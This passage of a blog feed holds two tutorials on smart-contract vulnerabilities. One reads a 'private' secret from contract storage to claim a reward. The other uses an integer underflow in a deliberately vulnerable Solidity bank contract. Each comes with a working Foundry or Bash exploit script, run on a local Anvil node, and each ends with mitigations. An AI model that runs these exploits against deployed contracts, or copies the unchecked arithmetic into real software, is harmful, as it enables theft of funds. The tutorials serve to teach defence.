// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Script.sol&quot;;
import &quot;../src/SecretOfEryndor.sol&quot;;

contract DeployScript is Script {
    function run() external {
        string memory secret = &quot;SuperSecureSecret1234!&quot;;
        uint256 fundingAmount = 100 ether; // Minimum funding for the contract

        // Start broadcasting the transaction
        vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));

        // Deploy the contract with the secret and funding
        SecretOfEryndor deployedContract = (new SecretOfEryndor){
            value: fundingAmount
        }(secret);

        // Log the deployed contract&apos;s address
        console.log(&quot;Deployed SecretOfEryndor at:&quot;, address(deployedContract));

        vm.stopBroadcast();
    }
}

```
&lt;/details&gt;


The script begins by defining the deployment parameters. The `secret` variable holds the secret code required to claim the reward, and the `fundingAmount` sets the Ether balance transferred to the contract during deployment. These ensure the contract is correctly initialized and operational.

```solidity
string memory secret = &quot;SuperSecureSecret1234!&quot;;
uint256 fundingAmount = 100 ether; // Minimum funding for the contract

```

The `run` function, executed by Foundry during deployment, accesses the deployer’s private key from an environment variable. For this proof of concept, we store the keys in a `.env` file as a common practice within the community, keeping the setup straightforward and accessible. The deployment is broadcast using the `vm.startBroadcast` function, signaling that all subsequent transactions are being signed and sent to the network.

```solidity
vm.startBroadcast(vm.envUint(&quot;ADMIN_KEY&quot;));

```

The actual contract deployment occurs using the `new` keyword, with the `value` parameter specifying the Ether sent during initialization. This step deploys the **SecretOfEryndor** contract with the secret and funding amount provided.

```solidity
SecretOfEryndor deployedContract = (new SecretOfEryndor){
    value: fundingAmount
}(secret);

```

Once deployed, the contract’s address is logged to the console for easy reference. This enables immediate interaction with the contract in the test environment.

```solidity
console.log(&quot;Deployed SecretOfEryndor at:&quot;, address(deployedContract));

```

The deployment process is finalized with a call to `vm.stopBroadcast`, ensuring that all broadcasted transactions are completed.

```solidity
vm.stopBroadcast();

```

To execute this script, we’ll start by setting up the environment. The RPC URL for the Anvil local blockchain will be defined in the `foundry.yaml` configuration file, while the private keys for both the administrator and the attacker will be stored securely in the `.env` file. These keys will allow the script to access the respective accounts during deployment and testing. Once the setup is complete, the script can be executed using Foundry’s `forge` command. Upon successful deployment, the contract’s address will be displayed in the console, ready for testing and further interaction.

![](/content/images/2025/01/image-1.png)

foundry.yaml

![](/content/images/2025/01/image-2.png)

Private keys of the owner and the attacker

![](/content/images/2025/01/image-3.png)

Contract&apos;s deployment

# **Executing the Exploit: Using Foundry Scripts**

To demonstrate the vulnerabilities of the **SecretOfEryndor** contract, we will perform an exploit using Foundry’s scripting capabilities.

&lt;details&gt;
&lt;summary&gt;Exploit Code&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/Script.sol&quot;;
import &quot;forge-std/console.sol&quot;;

interface ISecretOfEryndor {
    function guessSecret(string memory _code) external;
}

contract RevealAndAttack is Script {
    function run() external {
        address contractAddress = 0x5FbDB2315678afecb367f032d93F642f64180aa3; // Replace with your deployed contract address
        uint256 slot = 1; // Slot 1: Where the `secret` is stored

        // Step 1: Query the attacker&apos;s balance before the attack
        address attacker = vm.addr(vm.envUint(&quot;ATTACKER_KEY&quot;));
        console.log(
            &quot;Attacker&apos;s initial balance (ETH):&quot;,
            attacker.balance / 1 ether
        );

        // Step 2: Query the storage slot to retrieve the raw secret
        bytes32 rawSecret = vm.load(contractAddress, bytes32(slot));
        console.logBytes32(rawSecret);

        // Step 3: Decode the secret and trim trailing null characters
        string memory decodedSecret = _bytes32ToString(rawSecret);
        console.log(&quot;Decoded Secret:&quot;, decodedSecret);

        // Step 4: Call the `guessSecret` function with the decoded secret
        vm.startBroadcast(vm.envUint(&quot;ATTACKER_KEY&quot;));
        ISecretOfEryndor(contractAddress).guessSecret(decodedSecret);
        vm.stopBroadcast();

        // Step 5: Query the attacker&apos;s balance after the attack
        console.log(
            &quot;Attacker&apos;s final balance (ETH):&quot;,
            attacker.balance / 1 ether
        );
    }

    // Helper function to trim padding and convert bytes32 to string
    function _bytes32ToString(
        bytes32 _data
    ) internal pure returns (string memory) {
        uint256 length = 0;
        while (length &lt; 32 &amp;&amp; _data[length] != 0) {
            length++;
        }
        bytes memory result = new bytes(length);
        for (uint256 i = 0; i &lt; length; i++) {
            result[i] = _data[i];
        }
        return string(result);
    }
}

```
&lt;/details&gt;


The first step is querying the attacker’s initial balance. Using Foundry’s `vm` utility, the script retrieves the attacker’s address and logs their current Ether holdings. This provides a baseline for assessing the impact of the exploit.

```solidity
address attacker = vm.addr(vm.envUint(&quot;ATTACKER_KEY&quot;));
console.log(&quot;Attacker&apos;s initial balance (ETH):&quot;, attacker.balance / 1 ether);

```

Next, the script targets the storage slot where the secret is stored. Since the contract’s layout is predictable, the secret resides in slot `1`. Using `vm.load`, the script retrieves the raw secret value directly from the blockchain’s storage.

```solidity
bytes32 rawSecret = vm.load(contractAddress, bytes32(slot));
console.logBytes32(rawSecret);

```

After extracting the raw secret, it is converted into a readable format. The `_bytes32ToString` helper function decodes the bytes and removes any trailing null characters, revealing the actual secret.

```solidity
string memory decodedSecret = _bytes32ToString(rawSecret);
console.log(&quot;Decoded Secret:&quot;, decodedSecret);

```

With the secret in hand, the attacker proceeds to exploit the contract. Broadcasting a transaction signed with the attacker’s private key, the script calls the `guessSecret` function using the decoded secret. This triggers the reward mechanism, transferring 5 ETH from the contract to the attacker.

```solidity
vm.startBroadcast(vm.envUint(&quot;ATTACKER_KEY&quot;));
ISecretOfEryndor(contractAddress).guessSecret(decodedSecret);
vm.stopBroadcast();

```

Finally, the script checks the attacker’s balance again to verify the success of the exploit. The difference in the balance confirms that the contract’s funds have been transferred.

```solidity
console.log(&quot;Attacker&apos;s final balance (ETH):&quot;, attacker.balance / 1 ether);

```

![](/content/images/2025/01/image-4.png)

Running the exploit

# **Top Three Solutions to Mitigate Storage Vulnerabilities**

Storing sensitive data directly on-chain poses significant risks, as attackers can query storage slots to extract private information, even if marked as `private`. However, these risks can be addressed with thoughtful design and best practices. Here are three primary solutions we recommend to mitigate such vulnerabilities effectively.

#### **1\. Hash Sensitive Data Before Storing It**

Instead of storing plaintext values like passwords or secrets directly in storage, store their hashed representations. Hashing is a one-way operation, making it computationally infeasible for an attacker to reverse-engineer the original value from the hash.

For example, use Solidity’s `keccak256` hashing function to hash the secret before storing it:

```solidity
bytes32 private hashedSecret;

constructor(string memory _secret) {
    hashedSecret = keccak256(abi.encodePacked(_secret));
}

```

When a user submits their guess, hash the input and compare it to the stored hash:

```solidity
function guessSecret(string memory _guess) public {
    require(keccak256(abi.encodePacked(_guess)) == hashedSecret, &quot;Incorrect secret&quot;);
}

```

#### **2\. Use Off-Chain Storage for Critical Data**

To completely avoid exposing sensitive data on-chain, store critical information off-chain. The blockchain can then store a reference to this data, such as a hash or unique identifier, which can be verified without revealing the actual content.

For example, instead of storing the secret on-chain, save it in a secure database or an off-chain decentralized storage system like IPFS. Then, use a hash of the secret for on-chain verification:

```solidity
bytes32 public secretHash;

constructor(bytes32 _secretHash) {
    secretHash = _secretHash;
}

```

#### **3\. Dynamically Generate Secrets**

Static secrets are inherently risky, as they remain constant and predictable. Instead, use dynamic, context-sensitive values that are generated based on factors like user addresses, timestamps, or random values. This approach ensures that secrets are unique for each interaction and cannot be precomputed or extracted.

For instance, you can combine a user’s address and a nonce to create a dynamic secret:

```solidity
function generateSecret(address user, uint256 nonce) internal pure returns (bytes32) {
    return keccak256(abi.encodePacked(user, nonce));
}

```

# **Conclusion**

This article explored how Solidity’s storage system, while efficient and predictable, can also expose smart contracts to critical vulnerabilities. Through the **SecretOfEryndor** contract, we saw how attackers can exploit the transparent nature of blockchain to retrieve sensitive information and execute exploits.

Using Foundry scripts, we demonstrated how to deploy and test contracts in a controlled environment, uncovering weaknesses and turning theoretical risks into practical insights. Finally, we examined effective solutions, like hashing sensitive data, utilizing off-chain storage, and dynamically generating secrets, to mitigate these vulnerabilities.

Blockchain&apos;s transparency is both a feature and a challenge, but with thoughtful design and the right tools, developers can build smart contracts that are secure, robust, and trustworthy. Now, it’s your turn to apply these lessons and take your blockchain projects to the next level.

# References

-   **Foundry** - A Blazing Fast, Modular, and Portable Ethereum Development Framework. _&quot;Foundry Documentation.&quot;_ Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
-   **Solidity** - Language for Smart Contract Development. _&quot;Solidity Documentation.&quot;_ Available at: [https://docs.soliditylang.org/](https://docs.soliditylang.org/)
-   **OpenZeppelin** - Secure Smart Contract Libraries. _&quot;OpenZeppelin Contracts Documentation.&quot;_ Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
-   **Ethereum** - Open-Source Blockchain Platform for Smart Contracts. _&quot;Ethereum Whitepaper.&quot;_ Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   **Anvil** - A Local Ethereum Development Node for Testing Smart Contracts. _&quot;Anvil Documentation.&quot;_ Available at: [https://book.getfoundry.sh/anvil/](https://book.getfoundry.sh/anvil/)
-   **Etherscan** - Ethereum Block Explorer and Analytics Platform. _&quot;Etherscan Documentation.&quot;_ Available at: [https://etherscan.io/](https://etherscan.io/)
-   **Cast** - Interacting with Smart Contracts and Ethereum Nodes. _&quot;Foundry Documentation.&quot;_ Available at: [https://book.getfoundry.sh/reference/cast/](https://book.getfoundry.sh/reference/cast/)
-   **Blockchain Security** - Understanding and Mitigating Vulnerabilities in Smart Contracts. _&quot;Trail of Bits Blog.&quot;_ Available at: [https://blog.trailofbits.com/](https://blog.trailofbits.com/)
-   **Storage in Solidity** - Detailed Analysis of Solidity Storage Mechanics. _&quot;Solidity Documentation.&quot;_ Available at: https://docs.soliditylang.org/en/latest/internals/layout\_in\_storage.html</content:encoded><author>Ruben Santos</author></item><item><title>Breaking the Bank: Exploiting Integer Underflow in Smart Contracts</title><link>https://www.kayssel.com/post/web3-8</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-8</guid><description>This chapter explores an integer underflow vulnerability in the DecentralizedBank contract. Using Anvil and a Bash script, we simulate an attack where the attacker inflates their balance due to a logic flaw and withdraws 5 ETH, showcasing the importance of proper validation in smart contracts.</description><pubDate>Sun, 29 Dec 2024 11:09:00 GMT</pubDate><content:encoded># Introduction

Imagine walking into a bank with just a penny in your pocket and somehow walking out a billionaire due to a small glitch in their system. Sounds like the plot of a sci-fi movie, right? But in the world of smart contracts, vulnerabilities like **integer underflow** can make similar scenarios a possibility. While modern versions of Solidity (starting from 0.8.0) have largely addressed these issues, older contracts remain vulnerable, and understanding these risks is critical for anyone working in decentralized systems.

In this chapter, we’ll take a deep dive into how underflow attacks work. Using **Anvil** to create a controlled testing environment, we’ll explore the weaknesses of a contract called **DecentralizedBank**. Step by step, we’ll show how a simple flaw in its withdrawal logic can be exploited to turn a small deposit into a fortune—and ultimately drain the contract. Ready to uncover how this classic vulnerability unfolds? Let’s get started.

# What is an Integer Overflow?

To understand this vulnerability, think of a clock with numbers from 1 to 12. If the time is 12 and you add one more hour, instead of reaching 13, it wraps back to 1. This “wrap-around” behavior is a great analogy for what happens during an integer overflow in programming.

In Solidity, integers have fixed limits. For example, a `uint8` can store numbers between 0 and 255. If you try to add 1 to 255, instead of resulting in 256, the value “wraps around” to 0. This behavior can have serious implications, especially in financial applications where precision is critical.

Here’s an example in Solidity to demonstrate:

```solidity
uint8 public counter = 255;

function increment() public {
    counter += 1; // Overflow occurs, and counter becomes 0.
}

```

Now imagine this happening in a bank. You request to withdraw $1,001, but their system can only count up to $1,000. Instead of rejecting your request, the system wraps around and gives you just $1—or, in the case of a savvy attacker, much more than intended.

When this occurs in smart contracts, it can lead to major problems:

-   **Fake balances:** Attackers might manipulate the system to believe they own far more than they actually do.
-   **Broken rules:** Constraints like “you can only withdraw what you’ve deposited” can be bypassed.
-   **Excessive payouts:** Contracts may accidentally reward users far beyond what’s reasonable.

Understanding this vulnerability is key to protecting your smart contracts. Now that we’ve broken down the concept, let’s dive into a practical example and see how this issue can be exploited.

# Vulnerable Smart Contract

At first glance, the **DecentralizedBank** contract looks simple and functional. Users can deposit Ether, withdraw it later, and their balances are recorded in a public ledger. Straightforward, right? But hiding under this apparent simplicity is a critical vulnerability that can leave the contract wide open to exploitation.

&lt;details&gt;
&lt;summary&gt;Vulnerable Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

// Contract for a decentralized bank
contract DecentralizedBank {
    // Mapping to store user deposits, linking an address to its balance
    mapping(address =&gt; uint256) public deposits;

    // Address of the contract owner (the account that deployed the contract)
    address public owner;

    // Event emitted when a user makes a deposit
    event DepositMade(address indexed user, uint256 amount);

    // Event emitted when a user makes a withdrawal
    event WithdrawalMade(address indexed user, uint256 amount);

    // Constructor to set the contract owner at the time of deployment
    constructor() public {
        owner = msg.sender; // The deployer&apos;s address is stored as the owner
    }

    // Function to allow users to deposit Ether into the contract
    function deposit() public payable {
        // Ensure the deposit amount is greater than zero
        require(msg.value &gt; 0, &quot;Deposit must be greater than 0&quot;);

        // Add the deposit amount to the user&apos;s balance
        deposits[msg.sender] += msg.value;

        // Emit a DepositMade event for tracking
        emit DepositMade(msg.sender, msg.value);
    }

    // Function to allow users to withdraw a specific amount of Ether
    function withdraw(uint256 amount) public {
        // Deduct the requested amount from the user&apos;s balance
        deposits[msg.sender] -= amount;

        // Transfer the requested amount to the user&apos;s address
        (bool sent, ) = msg.sender.call{value: amount}(&quot;&quot;);
        // Ensure the transfer was successful
        require(sent, &quot;Withdrawal failed&quot;);

        // Emit a WithdrawalMade event for tracking
        emit WithdrawalMade(msg.sender, amount);
    }
}

```
&lt;/details&gt;


The backbone of the contract is a mapping called `deposits`. This mapping connects each user’s Ethereum address to the amount of Ether they’ve deposited, making it easy to track balances:

```solidity
mapping(address =&gt; uint256) public deposits;

```

The contract also includes an `owner` variable, which stores the address of the account that deployed the contract. This gives the owner specific administrative privileges:

```solidity
address public owner;

constructor() public {
    owner = msg.sender;
}

```

The `deposit` function allows users to add funds to the contract. Marked as `payable`, it ensures that users can send Ether along with their transaction. It requires the deposit to be greater than zero, updates the user’s balance in the `deposits` mapping, and emits an event for transparency:

```solidity
function deposit() public payable {
    require(msg.value &gt; 0, &quot;Deposit must be greater than 0&quot;);

    deposits[msg.sender] += msg.value;

    emit DepositMade(msg.sender, msg.value);
}

```

Everything seems fine so far, but the real trouble lies in the `withdraw` function. This function is supposed to let users withdraw Ether from their balance. However, there’s one major oversight—it doesn’t check whether the user’s balance is large enough to cover the withdrawal. Here’s the code:

```solidity
function withdraw(uint256 amount) public {
    deposits[msg.sender] -= amount;

    (bool sent, ) = msg.sender.call{value: amount}(&quot;&quot;);
    require(sent, &quot;Withdrawal failed&quot;);

    emit WithdrawalMade(msg.sender, amount);
}

```

Finally, the contract logs every deposit and withdrawal through two events, `DepositMade` and `WithdrawalMade`. These events are useful for tracking transactions and debugging but don’t prevent the underlying vulnerability.

# Exploiting the Vulnerability

Now that we understand the the **DecentralizedBank** contract, let’s explore how an attacker can exploit it step by step. At first glance, the `withdraw` function seems simple—it subtracts the requested amount from the user’s balance and transfers the Ether back to their wallet. However, as we’ve seen, the lack of a proper balance check opens the door to a devastating **integer underflow** attack.

Here’s how an attacker could exploit this vulnerability:

#### Make a Small Deposit

The attacker starts by depositing a tiny amount of Ether into the contract—just 1 wei, for example. This initializes their balance in the `deposits` mapping and allows them to interact with the `withdraw` function.

#### Trigger the Underflow

Next, the attacker calls the `withdraw` function, requesting more Ether than their balance can cover—let’s say 2 wei. When the contract tries to subtract 2 wei from their balance of 1 wei, the operation causes an integer underflow. Since unsigned integers like `uint256` can’t go negative, the balance “wraps around” to the maximum possible value for a `uint256`: `2^256 - 1`, which is an astronomically large number.

At this point, the attacker’s balance has been inflated to this massive value, far exceeding the total Ether held in the contract.

#### Drain the Contract

With their now-inflated balance, the attacker can withdraw any amount of Ether they choose. They might start with a large amount, such as 5 ETH, and continue making withdrawals until the contract’s funds are completely drained.

```mermaid
sequenceDiagram
    participant Attacker
    participant Contract
    participant Blockchain

    Attacker-&gt;&gt;Contract: deposit(1 wei)
    Contract--&gt;&gt;Attacker: Balance updated to 1 wei
    Attacker-&gt;&gt;Contract: withdraw(2 wei)
    Note right of Contract: Subtracts 2 wei from 1 wei&lt;br&gt;Integer underflow: Balance becomes 2^256 - 1
    Contract--&gt;&gt;Attacker: 2 wei transferred
    Attacker-&gt;&gt;Contract: withdraw(5 ETH)
    Note right of Contract: Contract attempts to send&lt;br&gt;funds to the attacker
    Contract--&gt;&gt;Attacker: 5 ETH transferred
    Contract-&gt;&gt;Blockchain: Contract drained

```

## The Exploit Script

Now that we’ve seen how the vulnerability works, let’s walk through how the exploit can be executed in practice. To simulate this attack, we’ll use a **Bash script** with tools like `cast` to interact with the contract in a controlled environment.

&lt;details&gt;
&lt;summary&gt;Exploit Script&lt;/summary&gt;

```bash
#!/bin/bash

# Force numeric format to English (dot as the decimal separator)
export LC_NUMERIC=&quot;en_US.UTF-8&quot;

# Configuration variables
RPC_URL=&quot;http://localhost:8545&quot;
OWNER_PK=&quot;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&quot;
ATTACKER_PK=&quot;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&quot;
CONTRACT_NAME=&quot;DecentralizedBank&quot;
CONTRACT_PATH=&quot;src/DecentralizedBank.sol:$CONTRACT_NAME&quot;

# Compile the contract
echo &quot;Compiling the contract...&quot;
forge build

# Deploy the contract
echo &quot;Deploying the contract $CONTRACT_NAME...&quot;
CONTRACT_ADDRESS=$(forge create $CONTRACT_PATH \
                             --rpc-url $RPC_URL \
                             --private-key $OWNER_PK | grep &quot;Deployed to&quot; | awk &apos;{print $NF}&apos;)

if [ -z &quot;$CONTRACT_ADDRESS&quot; ]; then
    echo &quot;Error: Failed to deploy the contract.&quot;
    exit 1
fi

echo &quot;Contract successfully deployed at: $CONTRACT_ADDRESS&quot;

# Owner deposits 10 ETH into the contract
echo &quot;Owner depositing 10 ETH into the contract...&quot;
cast send --rpc-url $RPC_URL \
          --private-key $OWNER_PK \
          --value 10ether \
          $CONTRACT_ADDRESS &quot;deposit()&quot;

# Attacker deposits 1 wei
echo &quot;Attacker depositing 1 wei...&quot;
cast send --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          --value 1wei \
          $CONTRACT_ADDRESS &quot;deposit()&quot;

# Check the attacker&apos;s deposit balance before the attack
echo &quot;Checking attacker&apos;s deposit balance before the attack...&quot;
ATTACKER_ADDRESS=$(cast wallet address --private-key $ATTACKER_PK)
attacker_balance_before=$(cast call --rpc-url $RPC_URL \
                 $CONTRACT_ADDRESS \
                 &quot;deposits(address)(uint256)&quot; $ATTACKER_ADDRESS)

if [ -z &quot;$attacker_balance_before&quot; ]; then
    echo &quot;Error: Unable to retrieve attacker&apos;s deposit balance before the attack.&quot;
    exit 1
fi

echo &quot;Attacker&apos;s deposit balance before the attack: $attacker_balance_before wei&quot;

# Attacker attempts to withdraw 2 wei
echo &quot;Attacker attempting to withdraw 2 wei (causing underflow)...&quot;
cast send --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          $CONTRACT_ADDRESS &quot;withdraw(uint256)&quot; 2

# Check the attacker&apos;s deposit balance after underflow
echo &quot;Checking attacker&apos;s deposit balance after underflow...&quot;
attacker_balance_after=$(cast call --rpc-url $RPC_URL \
                 $CONTRACT_ADDRESS \
                 &quot;deposits(address)(uint256)&quot; $ATTACKER_ADDRESS)

if [ -z &quot;$attacker_balance_after&quot; ]; then
    echo &quot;Error: Unable to retrieve attacker&apos;s deposit balance after underflow.&quot;
    exit 1
fi

echo &quot;Attacker&apos;s deposit balance after underflow: $attacker_balance_after wei&quot;


# Attacker withdraws a specific amount
echo &quot;Attacker attempting to withdraw 5 eth...&quot;
cast send --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          $CONTRACT_ADDRESS &quot;withdraw(uint256)&quot; 5000000000000000000

# Display the attacker&apos;s Ether balance after the withdrawal
echo &quot;Checking attacker&apos;s Ether balance after the withdrawal...&quot;
attacker_eth_balance=$(cast balance $ATTACKER_ADDRESS --rpc-url $RPC_URL)

# Convert balance from wei to ETH for readability
attacker_eth_balance_eth=$(awk &quot;BEGIN {print $attacker_eth_balance / 10^18}&quot;)

echo &quot;Attacker&apos;s Ether balance after withdrawal: $attacker_eth_balance_eth ETH&quot;


```
&lt;/details&gt;


The script begins by setting up the environment. It defines the **RPC\_URL** to connect to the local blockchain environment (Anvil) and includes private keys for both the contract owner and the attacker:

```bash
RPC_URL=&quot;http://localhost:8545&quot;
OWNER_PK=&quot;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&quot;
ATTACKER_PK=&quot;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&quot;

```

Next, the **DecentralizedBank** contract is deployed using `forge`, and its address is stored for future interactions. This ensures we can reference the deployed contract throughout the script:

```bash
CONTRACT_ADDRESS=$(forge create $CONTRACT_PATH \
                             --rpc-url $RPC_URL \
                             --private-key $OWNER_PK | grep &quot;Deployed to&quot; | awk &apos;{print $NF}&apos;)

```

This command compiles the contract and deploys it, capturing the deployed address for subsequent interactions. If deployment fails, the script gracefully exits to avoid further errors:

```bash
if [ -z &quot;$CONTRACT_ADDRESS&quot; ]; then
    echo &quot;Error: Failed to deploy the contract.&quot;
    exit 1
fi

```

After deploying the contract, the owner funds it with 10 ETH. This step ensures the contract has sufficient funds for the exploit:

```bash
cast send --rpc-url $RPC_URL \
          --private-key $OWNER_PK \
          --value 10ether \
          $CONTRACT_ADDRESS &quot;deposit()&quot;

```

With the contract ready, the attacker makes a small deposit of 1 wei. This initializes their balance in the contract’s `deposits` mapping, setting the stage for the exploit:

```bash
cast send --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          --value 1wei \
          $CONTRACT_ADDRESS &quot;deposit()&quot;

```

Before proceeding with the attack, the script queries and prints the attacker’s balance to verify it reflects the initial deposit. This ensures the setup is accurate:

```bash
ATTACKER_ADDRESS=$(cast wallet address --private-key $ATTACKER_PK)
attacker_balance_before=$(cast call --rpc-url $RPC_URL \
                 $CONTRACT_ADDRESS \
                 &quot;deposits(address)(uint256)&quot; $ATTACKER_ADDRESS)

```

Now, the attacker triggers the vulnerability by attempting to withdraw 2 wei, which is more than their deposit. This withdrawal causes the integer underflow, inflating their balance to the maximum possible value for a `uint256`:

```bash
cast send --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          $CONTRACT_ADDRESS &quot;withdraw(uint256)&quot; 2

```

After the exploit, the script queries and prints the attacker’s inflated balance, confirming the vulnerability has been successfully triggered:

```bash
attacker_balance_after=$(cast call --rpc-url $RPC_URL \
                 $CONTRACT_ADDRESS \
                 &quot;deposits(address)(uint256)&quot; $ATTACKER_ADDRESS)

```

Finally, the attacker withdraws 5 ETH from the contract to demonstrate the exploit’s impact. The script also checks and prints the attacker’s total Ether balance after the withdrawal:

```bash
# Attacker withdraws a specific amount
echo &quot;Attacker attempting to withdraw 5 eth...&quot;
cast send --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          $CONTRACT_ADDRESS &quot;withdraw(uint256)&quot; 5000000000000000000

# Display the attacker&apos;s Ether balance after the withdrawal
echo &quot;Checking attacker&apos;s Ether balance after the withdrawal...&quot;
attacker_eth_balance=$(cast balance $ATTACKER_ADDRESS --rpc-url $RPC_URL)

# Convert balance from wei to ETH for readability
attacker_eth_balance_eth=$(awk &quot;BEGIN {print $attacker_eth_balance / 10^18}&quot;)

echo &quot;Attacker&apos;s Ether balance after withdrawal: $attacker_eth_balance_eth ETH&quot;


```

## Running the exploit

With the exploit script ready, it’s time to put everything into action. Using **Anvil** as our local blockchain testing environment, we simulate the interactions step by step, from deploying the contract to executing the attack.

![](/content/images/2024/12/image-18.png)

Running Anvil

First, the script deploys the **DecentralizedBank** contract to Anvil. The deployment is confirmed, and the contract is assigned an address, which is stored for subsequent interactions. Once deployed, the contract owner funds it with 10 ETH, ensuring it has enough balance to handle the exploit. This initial funding lays the groundwork for the attacker to proceed.

![](/content/images/2024/12/image-23.png)

Deploying the contract

Next, the attacker makes their move by depositing 1 wei into the contract. Although this is an insignificant amount, it’s a crucial step as it initializes their balance in the `deposits` mapping, allowing them to interact with the `withdraw` function. The script verifies the attacker’s balance after this deposit, confirming it reflects the 1 wei accurately.

![](/content/images/2024/12/image-20.png)

Depositing 1 wei

The real exploit begins when the attacker attempts to withdraw 2 wei—more than their deposited balance. This triggers the integer underflow in the `withdraw` function, inflating the attacker’s balance to the maximum possible value for a `uint256`. The script retrieves and displays this new balance, which demonstrates the severity of the vulnerability.

![](/content/images/2024/12/image-21.png)

Withdrawing 2 wei

![](/content/images/2024/12/image-25.png)

Attack successful :)

Finally, the attacker withdraws 5 ETH from the contract to show the impact of the exploit. The script then checks and displays the attacker’s Ether balance, confirming the funds have been successfully transferred. This withdrawal illustrates how a small oversight in the contract’s logic can result in significant financial loss.

![](/content/images/2024/12/image-24.png)

Final balance after the attack

# Top 3 Solutions to Prevent Integer Underflow Vulnerabilities

Integer underflows can be devastating, but the good news is they’re entirely preventable with a few straightforward practices. Here are three effective ways to secure your smart contracts and keep them safe from these kinds of exploits.

The simplest and most reliable way to prevent underflows is to validate inputs before performing arithmetic operations. In the `withdraw` function, a quick check can block any attempt to withdraw more than the user’s current balance:

```solidity
require(deposits[msg.sender] &gt;= amount, &quot;Insufficient balance&quot;);

```

This one-liner acts like a bouncer at the club, ensuring that no invalid operations sneak through. It’s easy to implement and should be a default habit for any developer working on financial systems.

Starting with Solidity 0.8.0, arithmetic errors like overflows and underflows automatically revert the transaction. This means you don’t need extra checks or libraries—modern Solidity versions have your back:

```solidity
deposits[msg.sender] -= amount;

```

If the `amount` exceeds the user’s balance, the transaction fails before anything goes wrong. It’s like having an autopilot system that steps in when a pilot makes an error.

💡 _Why struggle with extra tools when your language can handle it for you?_

If you’re working with legacy contracts written in older versions of Solidity, the **SafeMath library** from OpenZeppelin is your best friend. It wraps arithmetic operations with checks to ensure they don’t cause underflows or overflows.

Here’s how it works:

```solidity
using SafeMath for uint256;
deposits[msg.sender] = deposits[msg.sender].sub(amount);

```

SafeMath ensures the operation is valid, and if something goes wrong, the transaction is reverted. It’s like retrofitting an old car with modern safety features—backward-compatible and life-saving.

# Conclusion

This chapter exposed the devastating consequences of a simple oversight in smart contract logic. The **DecentralizedBank** contract, while functional at first glance, contained a vulnerability that allowed a complete compromise: an integer underflow that enabled an attacker to drain all funds with ease.

For those analyzing smart contracts, this highlights the importance of identifying and exploiting weak points in arithmetic operations. A missing balance validation became the entry point for a catastrophic exploit, proving that even small errors can have significant consequences when combined with the immutable nature of blockchain technology.

Modern tools and techniques make such vulnerabilities both preventable and exploitable. Solidity versions 0.8.0+ automatically handle overflows and underflows, making these issues rare in newer deployments. However, older contracts and legacy systems remain vulnerable, creating opportunities for those who understand these risks. Understanding the behavior of unsigned integers, poorly validated user inputs, and unsafe arithmetic is key to uncovering exploitable logic.

Controlled environments like **Anvil** allow for safe experimentation and verification of vulnerabilities before testing them in real-world contexts. The ability to simulate attacks, manipulate contract states, and observe outcomes without consequences is invaluable for fine-tuning techniques and strategies.

This case study also underscores the power of small, precise actions. Exploiting the contract started with a minimal deposit and escalated into a complete takeover. Success lies in attention to detail and a thorough understanding of smart contract mechanics.

The takeaways are clear: understand the system, target its weakest points, and leverage vulnerabilities efficiently. Mastering these techniques enables both the identification and execution of attacks, as well as the ability to protect against them in the future. Let’s continue refining these skills to stay ahead in the evolving world of blockchain security.

# References

-   **Foundry** - A Blazing Fast, Modular, and Portable Ethereum Development Framework. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
-   **Solidity** - Language for Smart Contract Development. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/](https://docs.soliditylang.org/)
-   **OpenZeppelin** - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
-   **Ethereum** - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   **Anvil** - A Local Ethereum Development Node for Testing Smart Contracts. &quot;Anvil Documentation.&quot; Available at: https://book.getfoundry.sh/anvil/
-   **Integer Overflow and Underflow in Solidity** - Identifying and Preventing Arithmetic Vulnerabilities. &quot;Solidity Documentation.&quot; Available at: https://docs.soliditylang.org/en/v0.8.0/
-   **Etherscan** - Ethereum Block Explorer and Analytics Platform. &quot;Etherscan Documentation.&quot; Available at: [https://etherscan.io/](https://etherscan.io/)
-   **Cast** - Interacting with Smart Contracts and Ethereum Nodes. &quot;Foundry Documentation.&quot; Available at: https://book.getfoundry.sh/reference/cast/
-   **Blockchain Security** - Understanding and Mitigating Vulnerabilities in Smart Contracts. &quot;Trail of Bits Blog.&quot; Available at: https://blog.trailofbits.com/
